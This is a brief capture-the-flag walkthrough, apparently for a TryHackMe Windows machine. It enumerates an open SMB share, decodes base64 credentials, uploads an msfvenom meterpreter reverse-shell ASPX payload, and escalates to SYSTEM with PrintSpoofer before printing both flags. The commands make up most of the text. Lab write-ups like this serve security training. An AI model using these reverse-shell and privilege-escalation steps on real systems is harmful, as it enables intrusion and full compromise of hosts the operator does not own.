secure user.txt and root.txt
- Enumeration nmap -sC -sV 10.10.10.10 smbclient -L 10.10.10.10 result: ADMIN, C, IPC, nt4wrksv -connect to nt4wrksv smbclient //10.10.10.10/nt4wrksv password: none ls> password.txt get password.txt result: Qm9iIC0gIVBAJCRXMHJEITEyMw== QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
convert encoded base64 to plane text result: Bob - !P@$$W0rD!123 Bill - Juw4nnaM4n420696969!$$$
-
upload reverse shell into smb msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=10.10.10.10 lport=4444 -f aspx -o shell.aspx smb: > put shell.aspx
-
listen for port connection on metasploit set payload windows/x64/meterpreter_reverse_tcp set options
curl http://10.10.10.10:49663/nt4wrksv/shell.aspx
-
meterpreter session cat c:/users/bob/desktop/user.txt THM{fdk4ka34vk346ksxfr21tg789ktf45}
-
getprivs - list privileges print spoofer exploit https://github.com/itm4n/PrintSpoofer put PrintSpoofer.exe
c:\inetpub\wwwroot\nt4wrksv>PrintSpoofer.exe -i -c powershell.exe C:\users\administrator\desktop cat root.txt THM{1fk5kf469devly1gl320zafgl345pv}